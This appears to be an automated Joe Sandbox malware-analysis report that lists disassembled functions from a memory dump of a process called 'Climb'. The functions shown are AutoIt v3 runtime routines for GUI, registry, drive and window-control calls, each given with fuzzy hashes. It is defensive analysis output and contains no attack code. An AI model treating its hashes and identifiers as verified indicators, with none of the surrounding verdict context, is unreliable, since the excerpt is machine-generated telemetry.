SendMessageW.USER32(00000030,00000000,00000001), ref: 00AE343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AE347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AE348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00AE349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AE34D4
GetStockObject.GDI32(00000011), ref: 00AE34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AE34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AE34F4

Strings

DISPLAY, xrefs: 00AE33B7
msctls_progress32, xrefs: 00AE3470
AutoIt v3, xrefs: 00AE3355
static, xrefs: 00AE33AC, 00AE34CE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c0459468f495340c91474cc8645eb65db05453fdbdbf457f713b50c581cbcab8
Instruction ID: 81a1a389acdafce49db24cfb3c1fc17553ab257ab7c16f1def07b276a9ae0e3a
Opcode Fuzzy Hash: c0459468f495340c91474cc8645eb65db05453fdbdbf457f713b50c581cbcab8
Instruction Fuzzy Hash: F7B16F72A00205AFDB14DFA9DD49FAE7BB9EB08710F104115FA15E7290DB74ED41CBA4

Function 00AD5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD5532
GetDriveTypeW.KERNEL32(?,00AFDC30,?,\\.\,00AFDCD0), ref: 00AD560F
SetErrorMode.KERNEL32(00000000,00AFDC30,?,\\.\,00AFDCD0), ref: 00AD577B

Strings

Removable, xrefs: 00AD5655, 00AD565A
Network, xrefs: 00AD5647
RAMDisk, xrefs: 00AD5639
SCSI, xrefs: 00AD56CF
ATA, xrefs: 00AD56DD
\\.\, xrefs: 00AD5584
SAS, xrefs: 00AD570E
ATAPI, xrefs: 00AD56D6
Fixed, xrefs: 00AD564E
Virtual, xrefs: 00AD572A
1394, xrefs: 00AD56E4
Fibre, xrefs: 00AD56F2
PhysicalDrive, xrefs: 00AD55BB
RAID, xrefs: 00AD5700
FileBackedVirtual, xrefs: 00AD5731
CDROM, xrefs: 00AD5640
MMC, xrefs: 00AD5723
SSD, xrefs: 00AD568F
USB, xrefs: 00AD56F9
Unknown, xrefs: 00AD5632, 00AD56C8
SATA, xrefs: 00AD5715
iSCSI, xrefs: 00AD5707
SSA, xrefs: 00AD56EB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f7c6591a19aa5c1c4b829aeeefb4cd5acc05dc44ada1b3a2164335d460ef317b
Instruction ID: d6758b85574417292a9da0aae0222f1bbf08133fd84c6e8dcd639ec5096854ba
Opcode Fuzzy Hash: f7c6591a19aa5c1c4b829aeeefb4cd5acc05dc44ada1b3a2164335d460ef317b
Instruction Fuzzy Hash: E061B170E88905DBC724DF34DA929B877B1BF04350B3448A7E42BAB3A1DA31ED42CB55

Function 00AF1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AF1BC4
GetDesktopWindow.USER32 ref: 00AF1BD9
GetWindowRect.USER32(00000000), ref: 00AF1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00AF1C35
DestroyWindow.USER32(?), ref: 00AF1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00AF1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AF1CE1
IsWindowVisible.USER32(00000000), ref: 00AF1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AF1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AF1D6C
GetWindowRect.USER32(00000000,?), ref: 00AF1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00AF1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00AF1DC4
CopyRect.USER32(?,?), ref: 00AF1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00AF1E46

Strings

tooltips_class32, xrefs: 00AF1C82
0, xrefs: 00AF1B6F
(, xrefs: 00AF1DB7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d8b1836368d05af304d1adc3e5f6ad14a89a21ebcf39f222dd04fda7540b77ef
Instruction ID: 2027e5d21cf12bd7995ff4c90e34bb19bd8f19a356b9dd0efcdee4aadf63bfde
Opcode Fuzzy Hash: d8b1836368d05af304d1adc3e5f6ad14a89a21ebcf39f222dd04fda7540b77ef
Instruction Fuzzy Hash: 7EB16971604345EFD714DFA5C984B6AFBE5FF84310F008919FA999B2A1CB31E845CBA2

Function 00AF0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AF0D81
_wcslen.LIBCMT ref: 00AF0DBB
_wcslen.LIBCMT ref: 00AF0E25
_wcslen.LIBCMT ref: 00AF0E8D
_wcslen.LIBCMT ref: 00AF0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF0FA0

Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D

Part of subcall function 00AC2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2BA5
Part of subcall function 00AC2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC2BD7

Strings

ISSELECTED, xrefs: 00AF0F79
GETSELECTEDCOUNT, xrefs: 00AF0F0C, 00AF0F27
DESELECT, xrefs: 00AF1038
VIEWCHANGE, xrefs: 00AF1111
SELECTINVERT, xrefs: 00AF101A
SELECT, xrefs: 00AF0FE4
GETSELECTED, xrefs: 00AF107D
FINDITEM, xrefs: 00AF10C3
GETTEXT, xrefs: 00AF0E88, 00AF0EA3
SELECTCLEAR, xrefs: 00AF0FC9
GETITEMCOUNT, xrefs: 00AF0DB2, 00AF0DD3
SELECTALL, xrefs: 00AF0FB1
GETSUBITEMCOUNT, xrefs: 00AF0E20, 00AF0E3B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: f76e29ef29b1983b426844caa36a2a17893b148c95f0c451438fd74241a9adee
Instruction ID: 796d7768df283fa684a075c0d1092e2c07b0d744a6098cd1be8ddad602afb532
Opcode Fuzzy Hash: f76e29ef29b1983b426844caa36a2a17893b148c95f0c451438fd74241a9adee
Instruction Fuzzy Hash: B9E1D0322083458FC714DF64CA5093AB3E6FF88354B14896DF99A9B3A2DB30ED45CB91

Function 00A62521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A625F8
GetSystemMetrics.USER32(00000007), ref: 00A62600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A6262B
GetSystemMetrics.USER32(00000008), ref: 00A62633
GetSystemMetrics.USER32(00000004), ref: 00A62658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A62675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A62685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A626B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A626CC
GetClientRect.USER32(00000000,000000FF), ref: 00A626EA
GetStockObject.GDI32(00000011), ref: 00A62706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A62711

Part of subcall function 00A619CD: GetCursorPos.USER32(?), ref: 00A619E1
Part of subcall function 00A619CD: ScreenToClient.USER32(00000000,?), ref: 00A619FE
Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000001), ref: 00A61A23
Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000002), ref: 00A61A3D

SetTimer.USER32(00000000,00000000,00000028,00A6199C), ref: 00A62738

Strings

AutoIt v3 GUI, xrefs: 00A626B0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e1ee1d72efba7b981b3ea86776a0f63d7d6881f568db96e6dc4a1bf89121ef3d
Instruction ID: b8238ba2d6c00cd8950f8bd742da1f19bbd10e2fe791cda6fd0359eeb8d9e5ec
Opcode Fuzzy Hash: e1ee1d72efba7b981b3ea86776a0f63d7d6881f568db96e6dc4a1bf89121ef3d
Instruction Fuzzy Hash: ABB17A72A002099FDF15DFA8CC55BAE7BB5FB48314F104229FA06AB2E0DB74E941CB51

Function 00AC16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
Part of subcall function 00AC1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
Part of subcall function 00AC1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
Part of subcall function 00AC1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC1775
GetLengthSid.ADVAPI32(?), ref: 00AC178C
GetAce.ADVAPI32(?,00000000,?), ref: 00AC17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC17E2
GetLengthSid.ADVAPI32(?), ref: 00AC17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC1801
HeapAlloc.KERNEL32(00000000), ref: 00AC1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC1829
CopySid.ADVAPI32(00000000), ref: 00AC1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18BA
HeapFree.KERNEL32(00000000), ref: 00AC18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18CA
HeapFree.KERNEL32(00000000), ref: 00AC18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18DA
HeapFree.KERNEL32(00000000), ref: 00AC18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC18ED
HeapFree.KERNEL32(00000000), ref: 00AC18F4

Part of subcall function 00AC1ADF: GetProcessHeap.KERNEL32(00000008,00AC14FD,?,00000000,?,00AC14FD,?), ref: 00AC1AED
Part of subcall function 00AC1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC14FD,?), ref: 00AC1AF4
Part of subcall function 00AC1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC14FD,?), ref: 00AC1B03

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2b6fbee4a4d5bf519b8410a060817ce7eb9a05b3f3daaf8b9ee829015320344f
Instruction ID: 14c1f2d8bf9c318925f5add4a563ac61c8305f3e3c6f1adb8175d7ae9d223ced
Opcode Fuzzy Hash: 2b6fbee4a4d5bf519b8410a060817ce7eb9a05b3f3daaf8b9ee829015320344f
Instruction Fuzzy Hash: D4715BB2E04209ABDF11DFE5DC44FAEBBB9BF05340F154129E915A6191DB309A06CB60

Function 00AECE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AECF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00AFDCD0,00000000,?,00000000,?,?), ref: 00AECFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00AED004
_wcslen.LIBCMT ref: 00AED054
_wcslen.LIBCMT ref: 00AED0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00AED112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00AED221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00AED2AD
RegCloseKey.ADVAPI32(?), ref: 00AED2E1
RegCloseKey.ADVAPI32(00000000), ref: 00AED2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00AED3C0

Strings

REG_MULTI_SZ, xrefs: 00AED155
REG_DWORD, xrefs: 00AED264
REG_SZ, xrefs: 00AED0A4
REG_BINARY, xrefs: 00AED373
REG_EXPAND_SZ, xrefs: 00AED02D
REG_QWORD, xrefs: 00AED323

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: e39a8d8e1fcbf64c7a35cefdc32fb46f75d3c8e467bd055c8612ef71488c65c7
Instruction ID: dceb95a85409532f7f6a2cb0a01c8f35e31c4af20bd6ea9e4305c0f9b9bd21f1
Opcode Fuzzy Hash: e39a8d8e1fcbf64c7a35cefdc32fb46f75d3c8e467bd055c8612ef71488c65c7
Instruction Fuzzy Hash: A3127A756042019FDB14DF15C981A2AB7F5FF88724F04899CF99A9B3A2CB35ED42CB81

Function 00AF13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AF1462
_wcslen.LIBCMT ref: 00AF149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF14F0
_wcslen.LIBCMT ref: 00AF1526
_wcslen.LIBCMT ref: 00AF15A2
_wcslen.LIBCMT ref: 00AF161D

Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D

Part of subcall function 00AC3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AC3547

Strings

GETTOTALCOUNT, xrefs: 00AF148E, 00AF14B3
ISCHECKED, xrefs: 00AF177D
GETTEXT, xrefs: 00AF1733
EXISTS, xrefs: 00AF1618, 00AF1633
GETITEMCOUNT, xrefs: 00AF16BA
CHECK, xrefs: 00AF1521, 00AF153C
SELECT, xrefs: 00AF17AD
COLLAPSE, xrefs: 00AF159D, 00AF15B8
EXPAND, xrefs: 00AF1694
GETSELECTED, xrefs: 00AF16EA
UNCHECK, xrefs: 00AF17DA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 41b1aeb579435ed795c8bc510e74e0972f2745ddc6970af1f0f5b1902d450589
Instruction ID: 0af93af49f7b02b9d0e9a348174d03c590185eaa32636b4ca71ca0f9c4d083d6
Opcode Fuzzy Hash: 41b1aeb579435ed795c8bc510e74e0972f2745ddc6970af1f0f5b1902d450589
Instruction Fuzzy Hash: DCE1AD72608305CFCB14EF64C65092AB7F2BF98354B14895CF99A9B3A2DB31ED45CB81

Function 00AED3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
_wcslen.LIBCMT ref: 00AED451
_wcslen.LIBCMT ref: 00AED4C8
_wcslen.LIBCMT ref: 00AED4FE
_wcslen.LIBCMT ref: 00AED559
_wcslen.LIBCMT ref: 00AED58F
_wcslen.LIBCMT ref: 00AED5DF

Strings

HKCU, xrefs: 00AED62E
HKEY_CURRENT_CONFIG, xrefs: 00AED5D9, 00AED5DE
HKEY_USERS, xrefs: 00AED63F
HKCR, xrefs: 00AED589, 00AED58E
HKEY_LOCAL_MACHINE, xrefs: 00AED4C2, 00AED4C7
HKLM, xrefs: 00AED4F8, 00AED4FD
HKCC, xrefs: 00AED60C
HKU, xrefs: 00AED650
HKEY_CURRENT_USER, xrefs: 00AED61D
HKEY_CLASSES_ROOT, xrefs: 00AED553, 00AED558

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 73d91ca372180364d30340e68809c0336be97061737bba7d15845b2beb92484e
Instruction ID: d29b64820a04c4378d0a748d459553e765b3da38cc88aec411701bc968694f49
Opcode Fuzzy Hash: 73d91ca372180364d30340e68809c0336be97061737bba7d15845b2beb92484e
Instruction Fuzzy Hash: 917118736105A68BCB109F7DCE405BF33A2AF70358F210125FC6A9B294EA35DD44C7A0

Function 00AF8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AF8DB5
_wcslen.LIBCMT ref: 00AF8DC9
_wcslen.LIBCMT ref: 00AF8DEC
_wcslen.LIBCMT ref: 00AF8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AF8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AF6691), ref: 00AF8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AF8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8F5C
FreeLibrary.KERNEL32(?), ref: 00AF8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AF8F78
DestroyIcon.USER32(?,?,?,?,?,00AF6691), ref: 00AF8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AF8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AF8FB0

Strings

.exe, xrefs: 00AF8DE3
.icl, xrefs: 00AF8DC3
.dll, xrefs: 00AF8E06

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: e4a9b644668fcf62855ca11b50f70b83f257cbf8e5570fd05f745fd40268ace9
Instruction ID: 184a84385582291db71fdd79e8c6ab29db9429bf1910c9a2c3caa5890b02824f
Opcode Fuzzy Hash: e4a9b644668fcf62855ca11b50f70b83f257cbf8e5570fd05f745fd40268ace9
Instruction Fuzzy Hash: 2661BFB1900619BEEB14DFA4CC45BBE7BB9BF08B10F108506FA15D61D1DB79A990CBA0

Function 00AD48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00AD493D
_wcslen.LIBCMT ref: 00AD4948
_wcslen.LIBCMT ref: 00AD499F
_wcslen.LIBCMT ref: 00AD49DD
GetDriveTypeW.KERNEL32(?), ref: 00AD4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4ACC

Strings

closed, xrefs: 00AD494D, 00AD4972, 00AD498B, 00AD49C3, 00AD49DC
type cdaudio alias cd wait, xrefs: 00AD4A46
close cd wait, xrefs: 00AD4AB7
set cd door , xrefs: 00AD4A6D
open , xrefs: 00AD4A2A
close, xrefs: 00AD4943, 00AD495D
open, xrefs: 00AD4999, 00AD499E
wait, xrefs: 00AD4A89

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

